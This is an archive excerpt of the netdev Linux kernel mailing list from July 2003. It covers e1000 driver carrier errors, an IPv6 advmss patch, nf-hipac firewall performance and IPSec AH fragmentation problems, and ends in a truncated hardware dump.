------------- Requests By Attack No content in report. Compression Reports ------------------- Requests By Gzip Result No content in report. Most Average Compressed Requested URL, Top 10 Compression is in percent. No content in report. File Types With Highest Average Compression Level, Top 10 Compression is in percent. No content in report. Technical Reports ----------------- Requests By HTTP Method No content in report. Requests By HTTP Protocol Version No content in report. Requests By HTTP Result The most common HTTP status codes are given below: 200 OK (The request has succeeded.) 201 Created (The request has been fulfilled and resulted in a new resource being created.) 206 Partial Content (The server has fulfilled the partial GET request for the resource.) 301 Moved Permanently (The requested resource has been assigned a new permanent URI and any future references to this resource SHOULD use one of the returned URIs.) 302 Found (The requested resource resides temporarily under a different URI.) 304 Not Modified (The client has performed a conditional GET request and access is allowed, but the document has not been modified.) 403 Forbidden (The server understood the request, but is refusing to fulfill it.) 404 Not Found (The server has not found anything matching the Request-URI.) No content in report. Requests by Client Hosts By HTTP Result, Top 5 Clients No content in report. Requests by URL By HTTP Result, Top 5 URLs No content in report. -- LogReport sent to you by http://www.LogReport.org/ or@hibou.logreport.org mailto:logreport@logreport.org running lire-1.3.tar.gz The Online Report Responder Service is free of charge. We do not accept any liability however incurred in respect of a failure to perform as is imputable to the same for any loss direct or indirect. If you use the responder on a regular basis, please subscribe to our announcement mailing list (http://logreport.org/contact/lists/) to keep informed on updates and modification to the service. To support the online responder, make a donation to the LogReport Foundation (http://logreport.org/about/donate.php). From Larry.Sendlosky@storigen.com Wed Jul 2 07:59:45 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 07:59:49 -0700 (PDT) Received: from xchangeserver2.storigen.com ([65.193.106.66]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h62Exi2x003368 for ; Wed, 2 Jul 2003 07:59:45 -0700 X-MimeOLE: Produced By Microsoft Exchange V6.0.6375.0 content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Subject: e1000 in 2.4.21 and carrier errors Date: Wed, 2 Jul 2003 10:59:31 -0400 Message-ID: <7BFCE5F1EF28D64198522688F5449D5A01FF2AF7@xchangeserver2.storigen.com> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: e1000 in 2.4.21 and carrier errors Thread-Index: AcNAqop9ROmFxCNxTqOmxIx5r8BIYg== From: "Larry Sendlosky" To: Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h62Exi2x003368 X-archive-position: 3724 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: Larry.Sendlosky@storigen.com Precedence: bulk X-list: netdev We started running 2.4.21 and use the e1000 driver in the kernel. Our NICs are PRO-1000 82543GC based copper. Using the new driver we see constant increase in carrier errors. Loading the Intel e1000 v3.6.8.1 driver we have no carrier errors. This happens on all our systems with the PR0-1000 card using 2.4.21 and RH9. Switches are a mixture of Dell, Asante, Cisco, and Extreme. Any ideas? thanks larry From jmorris@intercode.com.au Wed Jul 2 09:01:11 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 09:01:15 -0700 (PDT) Received: from blackbird.intercode.com.au (IDENT:FHRUnQvXcBJGTwFDC/PQq8eV2MOvvdEj@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h62G172x004202 for ; Wed, 2 Jul 2003 09:01:09 -0700 Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h62G09r13320; Thu, 3 Jul 2003 02:00:10 +1000 Date: Thu, 3 Jul 2003 02:00:09 +1000 (EST) From: James Morris To: kuznet@ms2.inr.ac.ru cc: "David S. Miller" , , , Subject: Re: Fw: [PATCH 2.4.22-bk] dev->promiscuity refcounting broken in In-Reply-To: <200307020517.JAA05258@dub.inr.ac.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3725 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jmorris@intercode.com.au Precedence: bulk X-list: netdev On Wed, 2 Jul 2003 kuznet@ms2.inr.ac.ru wrote: > Dave, the patch looks OK. Applied to bk://kernel.bkbits.net/jmorris/net-2.5 and bk://kernel.bkbits.net/jmorris/net-2.4 - James -- James Morris From nf@hipac.org Wed Jul 2 09:58:11 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 09:58:22 -0700 (PDT) Received: from indyio.rz.uni-saarland.de (indyio.rz.uni-saarland.de [134.96.7.3]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h62Gw92x005473 for ; Wed, 2 Jul 2003 09:58:10 -0700 Received: from mars.rz.uni-saarland.de (mars.rz.uni-saarland.de [134.96.7.4]) by indyio.rz.uni-saarland.de (8.12.9/8.12.5) with ESMTP id h62Gw3fZ067817; Wed, 2 Jul 2003 18:58:03 +0200 (CEST) Received: from e002.stw.stud.uni-saarland.de (e002.stw.stud.uni-saarland.de [134.96.65.17]) by mars.rz.uni-saarland.de (8.9.3p2/8.8.4/8.8.2) with ESMTP id SAA279378; Wed, 2 Jul 2003 18:58:02 +0200 (CEST) Received: from e226.stw.stud.uni-saarland.de ([134.96.65.241] helo=hipac.org) by e002.stw.stud.uni-saarland.de with esmtp (Exim 3.35 #1 (Debian)) id 19Xkvi-0007iJ-00; Wed, 02 Jul 2003 18:58:02 +0200 Message-ID: <3F030EFC.7090809@hipac.org> Date: Wed, 02 Jul 2003 18:57:32 +0200 From: Michael Bellion and Thomas Heinz User-Agent: Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.0.0) Gecko/20020623 Debian/1.0.0-0.woody.1 X-Accept-Language: de, en MIME-Version: 1.0 To: P@draigbrady.com CC: linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: [ANNOUNCE] nf-hipac v0.8 released References: <200307021426.56138.nf@hipac.org> <3F02D964.7050301@draigBrady.com> <200307021548.19989.nf@hipac.org> <3F02EAE2.8050609@draigBrady.com> Content-Type: text/plain; charset=ISO-8859-1; format=flowed X-MIME-Autoconverted: from 8bit to quoted-printable by indyio.rz.uni-saarland.de id h62Gw3fZ067817 Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h62Gw92x005473 X-archive-position: 3726 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: nf@hipac.org Precedence: bulk X-list: netdev Hi Pádraig You wrote: > I was testing with 64 byte packets (so around 190Kpps). e100 cards at > least have a handy mode for continually sending a packet as fast as > possible. Also you can use more than one interface. Yes, that's true. When we did the performance tests we had in mind to compare the worst case behaviour of nf-hipac and iptables. Therefore we designed a ruleset which models the worst case for both iptables and nf-hipac. Of course, the test environment could have been tuned a lot more, e.g. udp instead of tcp, FORWARD chain instead of INPUT, tuned network parameters, more interfaces etc. Anyway, we prefer independent, more sophisticated performance tests. >>> # ./readprofile -m /boot/System.map | sort -nr | head -30 >>> 6779 total 0.0047 >>> 4441 default_idle 69.3906 >>> 787 handle_IRQ_event 7.0268 >>> 589 ip_packet_match 1.6733 >>> 433 ipt_do_table 0.6294 >>> 106 eth_type_trans 0.5521 >>> [...] > > Confused me too. The system would lock up and start dropping > packets after 125 rules. I.E. it would linearly degrade > as more rules were added. I'm guessing there is a fixed > interrupt overhead that is accounted for > by default_idle? Hm, but once the system starts to drop packets ip_packet_match and ipt_do_table start to dominate the profile, don't they? Regards, +-----------------------+----------------------+ | Michael Bellion | Thomas Heinz | | | | +-----------------------+----------------------+ From yoshfuji@linux-ipv6.org Wed Jul 2 10:54:15 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 10:54:22 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h62HsD2x006724 for ; Wed, 2 Jul 2003 10:54:15 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h62HtTBo003477; Thu, 3 Jul 2003 02:55:30 +0900 Date: Thu, 03 Jul 2003 02:55:29 +0900 (JST) Message-Id: <20030703.025529.100658086.yoshfuji@linux-ipv6.org> To: davem@redhat.com, jmorris@intercode.com.au CC: netdev@oss.sgi.com Subject: [PATCH] IPV6: fix a mistake in ipv6_advmss() conversion From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3727 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev Hello. Sorry, I introduced a bug in ipv6_advmss() while converting advmss calculation to inline function. This patch fixes the bug. Index: linux-2.5/net/ipv6/route.c =================================================================== RCS file: /home/cvs/linux-2.5/net/ipv6/route.c,v retrieving revision 1.43 diff -u -r1.43 route.c --- linux-2.5/net/ipv6/route.c 28 Jun 2003 03:58:20 -0000 1.43 +++ linux-2.5/net/ipv6/route.c 2 Jul 2003 16:25:04 -0000 @@ -602,6 +602,8 @@ static inline unsigned int ipv6_advmss(unsigned int mtu) { + mtu -= sizeof(struct ipv6hdr) + sizeof(struct tcphdr); + if (mtu < ip6_rt_min_advmss) mtu = ip6_rt_min_advmss; -- Hideaki YOSHIFUJI @ USAGI Project GPG FP: 9022 65EB 1ECF 3AD1 0BDF 80D8 4807 F894 E062 0EEA From scott.feldman@intel.com Wed Jul 2 13:53:15 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 13:53:22 -0700 (PDT) Received: from hermes.fm.intel.com (fmr01.intel.com [192.55.52.18]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h62KrF2x008796 for ; Wed, 2 Jul 2003 13:53:15 -0700 Received: from petasus.fm.intel.com (petasus.fm.intel.com [10.1.192.37]) by hermes.fm.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h62KmMB03526 for ; Wed, 2 Jul 2003 20:48:22 GMT Received: from fmsmsxv040-1.fm.intel.com (fmsmsxv040-1.fm.intel.com [132.233.48.108]) by petasus.fm.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h62KkGZ09881 for ; Wed, 2 Jul 2003 20:46:16 GMT Received: from [134.134.179.196] ([134.134.179.196]) by fmsmsxv040-1.fm.intel.com (NAVGW 2.5.2.11) with SMTP id M2003070213524023002 ; Wed, 02 Jul 2003 13:52:40 -0700 Date: Wed, 2 Jul 2003 14:09:09 -0700 (PDT) From: "Feldman, Scott" X-X-Sender: scott.feldman@localhost.localdomain Reply-To: "Feldman, Scott" To: Larry Sendlosky cc: netdev@oss.sgi.com Subject: Re: e1000 in 2.4.21 and carrier errors In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3728 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: scott.feldman@intel.com Precedence: bulk X-list: netdev On Wed, 2 Jul 2003, Larry Sendlosky wrote: > We started running 2.4.21 and use the e1000 driver in the kernel. Our > NICs are PRO-1000 82543GC based copper. Using the new driver we see > constant increase in carrier errors. Loading the Intel e1000 v3.6.8.1 > driver we have no carrier errors. This happens on all our systems with > the PR0-1000 card using 2.4.21 and RH9. Switches are a mixture of Dell, > Asante, Cisco, and Extreme. > > Any ideas? Hi Larry, apply this patch to 3.6.8.1 and see if you get carrier errors. Looks to me like a bug that was fixed in later drivers. Doesn't explain why we're getting carrier errors, but this will let us moved forward to 2.4.21. What are you testing with? Do you have any newer adapters (82544/5/6) you could try in the same setup? -scott diff -Naurp e1000-3.6.8.1/src/e1000_main.c e1000-3.6.8.1-mod/src/e1000_main.c --- e1000-3.6.8.1/src/e1000_main.c 2001-12-28 15:06:18.000000000 -0800 +++ e1000-3.6.8.1-mod/src/e1000_main.c 2003-07-02 14:03:02.000000000 -0700 @@ -2928,6 +2928,7 @@ UpdateStatsCounters(struct adapter * Ada Adapter->net_stats.tx_aborted_errors = Adapter->Ecol; Adapter->net_stats.tx_fifo_errors = Adapter->Tuc; Adapter->net_stats.tx_window_errors = Adapter->Latecol; + Adapter->net_stats.tx_carrier_errors = Adapter->Tncrs; /* Tx Dropped needs to be maintained elsewhere */ From latten@austin.ibm.com Wed Jul 2 16:50:05 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 16:50:11 -0700 (PDT) Received: from e35.co.us.ibm.com (e35.co.us.ibm.com [32.97.110.133]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h62No42x012030 for ; Wed, 2 Jul 2003 16:50:05 -0700 Received: from westrelay04.boulder.ibm.com (westrelay04.boulder.ibm.com [9.17.193.32]) by e35.co.us.ibm.com (8.12.9/8.12.2) with ESMTP id h62NnJxe106086; Wed, 2 Jul 2003 19:49:19 -0400 Received: from austin.ibm.com (d03av02.boulder.ibm.com [9.17.193.82]) by westrelay04.boulder.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h62NnGsH202560; Wed, 2 Jul 2003 17:49:17 -0600 Received: from faith.austin.ibm.com (faith.austin.ibm.com [9.41.94.16]) by austin.ibm.com (8.12.9/8.12.9) with ESMTP id h62NnGTi030114; Wed, 2 Jul 2003 18:49:16 -0500 Received: from faith.austin.ibm.com (localhost.localdomain [127.0.0.1]) by faith.austin.ibm.com (8.12.5/8.12.8) with ESMTP id h62NsOIY002989; Wed, 2 Jul 2003 18:54:24 -0500 Received: (from jml@localhost) by faith.austin.ibm.com (8.12.5/8.12.5/Submit) id h62NsMYP002987; Wed, 2 Jul 2003 18:54:23 -0500 Date: Wed, 2 Jul 2003 18:54:23 -0500 From: latten@austin.ibm.com Message-Id: <200307022354.h62NsMYP002987@faith.austin.ibm.com> To: netdev@oss.sgi.com Subject: IPSecv6 AH doesn't work with Fragmenting Cc: davem@redhat.com, kuznet@ms2.inr.ac.ru X-archive-position: 3729 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: latten@austin.ibm.com Precedence: bulk X-list: netdev I am using netperf to stress IPSecv6 with AH protocol. Netperf sent a stream of TCP packets to the receiver. I examined the log on my receiver and saw many "IPSec ah authentication error" messages. I then sniffed my incoming packets and saw that they had been fragmented and each fragment was reported as being malformed. Source Destination Protocol Info 1 fec0:0:0:105::56 fec0:0:0:105::55 TCP 32780 > 32772 [ACK]... 2 fec0:0:0:105::56 fec0:0:0:105::55 AH AH (SPI=0x00000000)[Malformed Packet] 3 fec0:0:0:105::55 fec0:0:0:105::56 TCP 32772 > 32780 [ACK]... 4 fec0:0:0:105::56 fec0:0:0:105::55 TCP 32780 > 32772 [ACK]... 5 fec0:0:0:105::56 fec0:0:0:105::55 AH AH (SPI=0x00000000)[ Malformed Packet] Just for the heck of it, I did a "ping6 -s 1800" and sniffed the wire and although the ping/ICMPv6 works fine in that I get a reply and no authentication failures are logged, my packets are reported as being malformed. It seems AH with fragmenting is not working properly and perhaps that is the cause of all the AH authentication errors I see in my log. Unfortunately I could not cut and paste my ethereal output but if anyone is interested I could send it. It is also easy to reproduce. Just configure AHv6 manually between two machines and run netperf or ping6 -s or anything that would result in fragmentation. Joy From zwane@arm.linux.org.uk Wed Jul 2 17:16:19 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 17:16:32 -0700 (PDT) Received: from hemi.commfireservices.com ([66.212.224.118]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h630GF2x012524 for ; Wed, 2 Jul 2003 17:16:18 -0700 Received: from montezuma.mastecende.com (cuda.commfireservices.com [24.203.207.204]) by hemi.commfireservices.com (Postfix) with ESMTP id 59C34BC51; Wed, 2 Jul 2003 20:06:02 -0400 (EDT) Received: from localhost.localdomain (localhost.localdomain [127.0.0.1]) by montezuma.mastecende.com (8.12.8/8.12.8) with ESMTP id h63053vo011678; Wed, 2 Jul 2003 20:05:03 -0400 Date: Wed, 2 Jul 2003 20:05:03 -0400 (EDT) From: Zwane Mwaikambo X-X-Sender: zwane@montezuma.mastecende.com To: "Feldman, Scott" Cc: netdev@oss.sgi.com Subject: RE: e1000 lockup with port io type reset In-Reply-To: Message-ID: References: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3730 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: zwane@arm.linux.org.uk Precedence: bulk X-list: netdev On Sat, 28 Jun 2003, Zwane Mwaikambo wrote: > Thanks, i just have to wait on the dmi decode. I'll have it to you ASAP. Here we go; # dmidecode 2.1 SMBIOS 2.3 present. 46 structures occupying 1342 bytes. Table at 0x000F2970. Handle 0x0000 DMI type 0, 20 bytes. BIOS Information Vendor: Award Software, Inc. Version: ASUS CUV4X-E ACPI BIOS Revision 1004 Release Date: 07/25/2001 Address: 0xF0000 Runtime Size: 64 kB ROM Size: 256 kB Characteristics: PCI is supported PNP is supported APM is supported BIOS is upgradeable BIOS shadowing is allowed ESCD support is available Boot from CD is supported Selectable boot is supported BIOS ROM is socketed EDD is supported 5.25"/360 KB floppy services are supported (int 13h) 5.25"/1.2 MB floppy services are supported (int 13h) 3.5"/720 KB floppy services are supported (int 13h) 3.5"/2.88 MB floppy services are supported (int 13h) Print screen service is supported (int 5h) 8042 keyboard services are supported (int 9h) Serial services are supported (int 14h) Printer services are supported (int 17h) CGA/mono video services are supported (int 10h) ACPI is supported AGP is supported Handle 0x0001 DMI type 1, 25 bytes. System Information Manufacturer: System Manufacturer Product Name: System Name Version: System Version Serial Number: SYS-1234567890 UUID: Not Settable Wake-up Type: Power Switch Handle 0x0002 DMI type 2, 8 bytes. Base Board Information Manufacturer: ASUSTeK Computer INC. Product Name: CUV4X-E Version: REV 1.xx Serial Number: xxxxxxxxxxx Handle 0x0003 DMI type 3, 17 bytes. Chassis Information Manufacturer: Chassis Manufacture Type: Tower Lock: Not Present Version: Chassis Version Serial Number: Chassis Serial Number Asset Tag: Asset-1234567890 Boot-up State: Safe Power Supply State: Safe Thermal State: Safe Security Status: Unknown OEM Information: 0x00000000 Handle 0x0004 DMI type 4, 32 bytes. Processor Information Socket Designation: PGA 370 Type: Central Processor Family: Celeron Manufacturer: GenuineIntel ID: 8A 06 00 00 FF F9 83 03 Signature: Type 0, Family 6, Model 8, Stepping 10 Flags: FPU (Floating-point unit on-chip) VME (Virtual mode extension) DE (Debugging extension) PSE (Page size extension) TSC (Time stamp counter) MSR (Model specific registers) PAE (Physical address extension) MCE (Machine check exception) CX8 (CMPXCHG8 instruction supported) SEP (Fast system call) MTRR (Memory type range registers) PGE (Page global enable) MCA (Machine check architecture) CMOV (Conditional move instruction supported) PAT (Page attribute table) PSE-36 (36-bit page size extension) MMX (MMX technology supported) FXSR (Fast floating-point save and restore) SSE (Streaming SIMD extensions) Version: Intel Celeron(TM) Processor Voltage: 1.7 V External Clock: 100 MHz Max Speed: 1200 MHz Current Speed: 1100 MHz Status: Populated, Enabled Upgrade: LIF Socket L1 Cache Handle: 0x000A L2 Cache Handle: 0x000B L3 Cache Handle: Not Provided Handle 0x0005 DMI type 5, 24 bytes. Memory Controller Information Error Detecting Method: None Error Correcting Capabilities: Other Supported Interleave: Unknown Current Interleave: Unknown Maximum Memory Module Size: 1024 MB Maximum Total Memory Size: 4096 MB Supported Speeds: 70 ns 60 ns 50 ns Supported Memory Types: DIMM SDRAM Memory Module Voltage: 3.3 V Associated Memory Slots: 4 0x0006 0x0007 0x0008 0x0009 Enabled Error Correcting Capabilities: Unknown Handle 0x0006 DMI type 6, 12 bytes. Memory Module Information Socket Designation: DIMM 1 Bank Connections: 0 1 Current Speed: Unknown Type: DIMM SDRAM Installed Size: 128 MB (Single-bank Connection) Enabled Size: 128 MB (Single-bank Connection) Error Status: OK Handle 0x0007 DMI type 6, 12 bytes. Memory Module Information Socket Designation: DIMM 2 Bank Connections: 2 3 Current Speed: Unknown Type: DIMM SDRAM Installed Size: 128 MB (Double-bank Connection) Enabled Size: 128 MB (Double-bank Connection) Error Status: OK Handle 0x0008 DMI type 6, 12 bytes. Memory Module Information Socket Designation: DIMM 3 Bank Connections: 4 5 Current Speed: Unknown Type: DIMM SDRAM Installed Size: Not Installed (Single-bank Connection) Enabled Size: Not Installed (Single-bank Connection) Error Status: OK Handle 0x0009 DMI type 6, 12 bytes. Memory Module Information Socket Designation: DIMM 4 Bank Connections: 6 7 Current Speed: Unknown Type: DIMM SDRAM Installed Size: Not Installed (Single-bank Connection) Enabled Size: Not Installed (Single-bank Connection) Error Status: OK Handle 0x000A DMI type 7, 19 bytes. Cache Information Socket Designation: L1 Cache Configuration: Enabled, Not Socketed, Level 1 Operational Mode: Write Back Location: Internal Installed Size: 32 KB Maximum Size: 32 KB Supported SRAM Types: Pipeline Burst Synchronous Installed SRAM Type: Pipeline Burst Synchronous Speed: Unknown Error Correction Type: Unknown System Type: Data Associativity: 4-way Set-associative Handle 0x000B DMI type 7, 19 bytes. Cache Information Socket Designation: L2 Cache Configuration: Enabled, Not Socketed, Level 2 Operational Mode: Write Back Location: Internal Installed Size: 128 KB Maximum Size: 256 KB Supported SRAM Types: Pipeline Burst Synchronous Installed SRAM Type: Pipeline Burst Synchronous Speed: Unknown Error Correction Type: Unknown System Type: Data Associativity: 4-way Set-associative Handle 0x000C DMI type 8, 9 bytes. Port Connector Information Internal Reference Designator: PRIMARY IDE/HDD Internal Connector Type: On Board IDE External Reference Designator: Not Specified External Connector Type: None Port Type: None Handle 0x000D DMI type 8, 9 bytes. Port Connector Information Internal Reference Designator: SECONDARY IDE/HDD Internal Connector Type: On Board IDE External Reference Designator: Not Specified External Connector Type: None Port Type: None Handle 0x000E DMI type 8, 9 bytes. Port Connector Information Internal Reference Designator: FLOPPY Internal Connector Type: On Board Floppy External Reference Designator: Not Specified External Connector Type: None Port Type: None Handle 0x000F DMI type 8, 9 bytes. Port Connector Information Internal Reference Designator: Not Specified Internal Connector Type: None External Reference Designator: USB1 External Connector Type: Access Bus (USB) Port Type: USB Handle 0x0010 DMI type 8, 9 bytes. Port Connector Information Internal Reference Designator: Not Specified Internal Connector Type: None External Reference Designator: USB2 External Connector Type: Access Bus (USB) Port Type: USB Handle 0x0011 DMI type 8, 9 bytes. Port Connector Information Internal Reference Designator: Not Specified Internal Connector Type: None External Reference Designator: PS/2 Keybaord External Connector Type: PS/2 Port Type: Keyboard Port Handle 0x0012 DMI type 8, 9 bytes. Port Connector Information Internal Reference Designator: Not Specified Internal Connector Type: None External Reference Designator: PS/2 Mouse External Connector Type: PS/2 Port Type: Mouse Port Handle 0x0013 DMI type 8, 9 bytes. Port Connector Information Internal Reference Designator: Not Specified Internal Connector Type: None External Reference Designator: Parallel Port External Connector Type: DB-25 female Port Type: Parallel Port ECP/EPP Handle 0x0014 DMI type 8, 9 bytes. Port Connector Information Internal Reference Designator: Not Specified Internal Connector Type: None External Reference Designator: Serial Port External Connector Type: DB-9 male Port Type: Serial Port 16550 Compatible Handle 0x0015 DMI type 8, 9 bytes. Port Connector Information Internal Reference Designator: Not Specified Internal Connector Type: None External Reference Designator: Serial Port 2 External Connector Type: DB-9 male Port Type: Serial Port 16550 Compatible Handle 0x0016 DMI type 8, 9 bytes. Port Connector Information Internal Reference Designator: Not Specified Internal Connector Type: None External Reference Designator: Video Port External Connector Type: Mini Jack (headphones) Port Type: Video Port Handle 0x0017 DMI type 9, 13 bytes. System Slot Information Designation: PCI 1 Type: 32-bit PCI Current Usage: Available Length: Short ID: 1 Characteristics: 5.0 V is provided 3.3 V is provided PME signal is supported Handle 0x0018 DMI type 9, 13 bytes. System Slot Information Designation: PCI 2 Type: 32-bit PCI Current Usage: In Use Length: Short ID: 2 Characteristics: 5.0 V is provided 3.3 V is provided PME signal is supported Handle 0x0019 DMI type 9, 13 bytes. System Slot Information Designation: PCI 3 Type: 32-bit PCI Current Usage: In Use Length: Short ID: 3 Characteristics: 5.0 V is provided 3.3 V is provided PME signal is supported Handle 0x001A DMI type 9, 13 bytes. System Slot Information Designation: PCI 4 Type: 32-bit PCI Current Usage: In Use Length: Short ID: 4 Characteristics: 5.0 V is provided 3.3 V is provided PME signal is supported Handle 0x001B DMI type 9, 13 bytes. System Slot Information Designation: PCI 5 Type: 32-bit PCI Current Usage: Available Length: Short ID: 5 Characteristics: 5.0 V is provided 3.3 V is provided PME signal is supported Handle 0x001C DMI type 9, 13 bytes. System Slot Information Designation: PCI 6 Type: 32-bit PCI Current Usage: Available Length: Short ID: 6 Characteristics: 5.0 V is provided 3.3 V is provided PME signal is supported Handle 0x001D DMI type 9, 13 bytes. System Slot Information Designation: AGP Type: 32-bit PCI Current Usage: In Use Length: Short ID: 7 Characteristics: 3.3 V is provided PME signal is supported Handle 0x001E DMI type 11, 5 bytes. OEM Strings String 1: 0 String 2: 0 Handle 0x001F DMI type 13, 22 bytes. BIOS Language Information Installable Languages: 1 en|US|iso8859-1 Currently Installed Language: en|US|iso8859-1 Handle 0x0020 DMI type 14, 14 bytes. Group Associations Name: Cpu Module Items: 3 0x0004 (Processor) 0x000A (Cache) 0x000B (Cache) Handle 0x0021 DMI type 14, 35 bytes. Group Associations Name: Memory Module Set Items: 10 0x0022 (Physical Memory Array) 0x0023 (Memory Device) 0x0028 (Memory Device Mapped Address) 0x0024 (Memory Device) 0x0029 (Memory Device Mapped Address) 0x0025 (Memory Device) 0x002A (Memory Device Mapped Address) 0x0026 (Memory Device) 0x002B (Memory Device Mapped Address) 0x0027 (Memory Array Mapped Address) Handle 0x0022 DMI type 16, 15 bytes. Physical Memory Array Location: System Board Or Motherboard Use: System Memory Error Correction Type: None Maximum Capacity: 1 GB Error Information Handle: Not Provided Number Of Devices: 4 Handle 0x0023 DMI type 17, 23 bytes. Memory Device Array Handle: 0x0022 Error Information Handle: No Error Total Width: 72 bits Data Width: 64 bits Size: 128 MB Form Factor: DIMM Set: 1 Locator: DIMM 1 Bank Locator: Not Specified Type: DRAM Type Detail: Synchronous Speed: Unknown Handle 0x0024 DMI type 17, 23 bytes. Memory Device Array Handle: 0x0022 Error Information Handle: No Error Total Width: 72 bits Data Width: 64 bits Size: 128 MB Form Factor: DIMM Set: 2 Locator: DIMM 2 Bank Locator: Not Specified Type: DRAM Type Detail: Synchronous Speed: Unknown Handle 0x0025 DMI type 17, 23 bytes. Memory Device Array Handle: 0x0022 Error Information Handle: No Error Total Width: Unknown Data Width: Unknown Size: No Module Installed Form Factor: DIMM Set: 2 Locator: DIMM 3 Bank Locator: Not Specified Type: DRAM Type Detail: Synchronous Speed: Unknown Handle 0x0026 DMI type 17, 23 bytes. Memory Device Array Handle: 0x0022 Error Information Handle: No Error Total Width: Unknown Data Width: Unknown Size: No Module Installed Form Factor: DIMM Set: 2 Locator: DIMM 4 Bank Locator: Not Specified Type: DRAM Type Detail: Synchronous Speed: Unknown Handle 0x0027 DMI type 19, 15 bytes. Memory Array Mapped Address Starting Address: 0x00000000000 Ending Address: 0x040000003FF Range Size: 268435457 kB Physical Array Handle: 0x0022 Partition Width: 0 Handle 0x0028 DMI type 20, 19 bytes. Memory Device Mapped Address Starting Address: 0x00000000000 Ending Address: 0x00007FFFFFF Range Size: 128 MB Physical Device Handle: 0x0023 Memory Array Mapped Address Handle: 0x0027 Partition Row Position: 1 Handle 0x0029 DMI type 20, 19 bytes. Memory Device Mapped Address Starting Address: 0x00008000000 Ending Address: 0x0000FFFFFFF Range Size: 128 MB Physical Device Handle: 0x0024 Memory Array Mapped Address Handle: 0x0027 Partition Row Position: 2 Handle 0x002A DMI type 126, 19 bytes. Inactive Handle 0x002B DMI type 126, 19 bytes. Inactive Handle 0x002C DMI type 32, 11 bytes. System Boot Information Status: No errors detected Handle 0x002D DMI type 127, 4 bytes. End Of Table 00:00.0 Host bridge: VIA Technologies, Inc. VT82C693A/694x [Apollo PRO133x] (rev c4) Subsystem: Asustek Computer, Inc.: Unknown device 80e7 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium >TAbort- SERR- Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00: 06 11 91 06 06 00 10 22 c4 00 00 06 00 00 00 00 10: 08 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 